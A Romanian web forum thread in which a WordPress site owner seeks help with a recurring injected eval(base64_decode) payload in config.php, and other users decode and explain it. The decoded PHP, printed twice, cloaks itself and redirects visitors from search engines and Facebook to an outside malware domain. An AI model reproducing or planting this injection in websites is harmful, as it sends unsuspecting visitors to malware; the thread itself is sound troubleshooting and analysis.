Neurochirurgie minim invazivă
"Primum non nocere" este ideea ce a deschis drumul medicinei spre minim invaziv. Avansul tehnologic extraordinar din ultimele decenii a permis dezvoltarea tuturor domeniilor medicinei. Microscopul operator, neuronavigația, tehnicile anestezice avansate permit intervenții chirurgicale tot mai precise, tot mai sigure. Neurochirurgia minim invazivă, sau prin "gaura cheii", oferă pacienților posibilitatea de a se opera cu riscuri minime, fie ele neurologice, infecțioase, medicale sau estetice. www.neurohope.ro |
eval(base64_decode) probleme, hack , virus
Last Updated: Aug 25 2013 10:55, Started by
am-draci
, Aug 14 2013 23:59
·
0
#1
Posted 14 August 2013 - 23:59
salut
am o problema cu un site in wordpress, pe el am instalat un theme free, companytrustse cheama. pluginuri am instalat mai mereu "WordPress SEO" by Yoast si BulletProof Security de cand cu problema. la un moment dat , daca cauti pe google site-ul , si dai click pe el, in loc sa intre pe site...intra pe un altceva decat site-ul meu... iar prima data tipa si antivirusul, spunand ceva de un malware script bla bla intre timp , am indentificat codul care face asta., se afla in config.php si este urmatorul: eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgewppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgYW5kICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpIGFuZCAhc3Ryc3RyKCRyZWZlcmVyLCJFZVlwM0Q3Iikpew0KaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3RvcnBzamZxLmRkbnMubWUudWsvIik7CmV4aXQoKTsNCn0KfQ0KfQ0KfQ0KfQ==")); faza e ca il sterg si reapare dupa cateva zile.... pls help! |
#2
Posted 15 August 2013 - 00:06
sterge pluginurile vulnerabile si schimba permisiunile fisierelor.
|
#3
Posted 15 August 2013 - 00:13
#4
Posted 15 August 2013 - 00:43
Din cate imi aduc aminte, codul vulnerabil face parte dintr-un plugin de management al imaginilor, nu mai stiu exact cum se cheama dar e posibil sa fie inclus in tema ta. Probabil e o versiune veche pentru ca problema asta a fost reparata demult.
|
#6
Posted 15 August 2013 - 00:48
Stringul ala decodat arata asa:
error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){ if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"webalta") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") and !stristr($referer,"inurl") and !strstr($referer,"EeYp3D7")){ header("Location: http://torpsjfq.ddns.me.uk/"); exit(); }}}}} Daca vizitatorul a venit de pe un motor de cautare sau de pe facebook atunci ii face redirect la siteul ala de malware. |
#7
Posted 15 August 2013 - 08:46
mufa, on 15 august 2013 - 00:47, said:
De curiozitate, ce ai in uploads? Media Library All (13) | Images (13) | Unattached (0) JayBird, on 15 august 2013 - 00:48, said:
Stringul ala decodat arata asa: error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){ if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"webalta") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") and !stristr($referer,"inurl") and !strstr($referer,"EeYp3D7")){ header("Location: http://torpsjfq.ddns.me.uk/"); exit(); }}}}} Daca vizitatorul a venit de pe un motor de cautare sau de pe facebook atunci ii face redirect la siteul ala de malware. |
#8
Posted 15 August 2013 - 10:35
Care-s permisiunile pr fişier, ce zice stat, ce zic logurile, apache, ftp, secure/auth?
|
#9
Posted 15 August 2013 - 11:37
#10
Posted 15 August 2013 - 12:27
am-draci, on 15 august 2013 - 08:46, said:
numai poze... Media Library All (13) | Images (13) | Unattached (0) asta stiu, ce nu stiu este cum ajunge sa puna codul asta de fiecare data cum il sterg. am mai descoperit in loguri ceva ce un prieten spune ca pare dubios 5.9.102.235 - - [14/Aug/2013:18:10:00 +0200] "POST /wp-cron.php?doing_wp_cron=1376496600.8815150260925292968750 HTTP/1.0" 200 - "-" "WordPress/3.6; http://site" 5.9.102.235 - - [14/Aug/2013:19:36:38 +0200] "POST/wp-cron.php?doing_wp_cron=1376501798.1998150348663330078125 HTTP/1.0" 200 - "-" "WordPress/3.6; http://site" 5.9.102.235 - - [15/Aug/2013:06:09:53 +0200] "POST/wp-cron.php?doing_wp_cron=1376539793.5667099952697753906250 HTTP/1.0"200 - "-" "WordPress/3.6; http://site" prietenul meu spune ca in afara de modificarile aduse de mine (post) nu trebuie sa mai apara nimeni asa. apar 2 loguri de pe ip-ul asta inainte sa sterg eu codul aseara si una azi dimineata la 6 ... insa codul nu a mai reaparut |
|
#12
Posted 16 August 2013 - 15:24
Probabil nu vei găsi nimic în logurile lui Apache/Nginx/whatever. Vezi în ftp/ssh/sftp
|
#13
Posted 23 August 2013 - 14:36
Cere de la providerul de gazduire ultimele accesari FTP sau daca are logging pentru headere.
La Wordpress oricum trebuie sa stau cu ochii ca pe butelie pe siteul lor si restul pluginurilor pentru probleme de securitate:) |
#14
Posted 23 August 2013 - 21:28
am sters permisiunile de scriere al fisierului...si pt owner... si se pare ca nu mai apare codul... inca astept cu ochii in 4
|
#15
Posted 24 August 2013 - 22:27
Pai daca siteul tau are o vulnerabilitate care ii permite sa ruleze alte programe atunci cred ca e in stare sa execute chmod sa schimbe permisiunea. Nu stiu daca e posibil asta in php dar asa pare.
|
|
Anunturi
▶ 0 user(s) are reading this topic
0 members, 0 guests, 0 anonymous users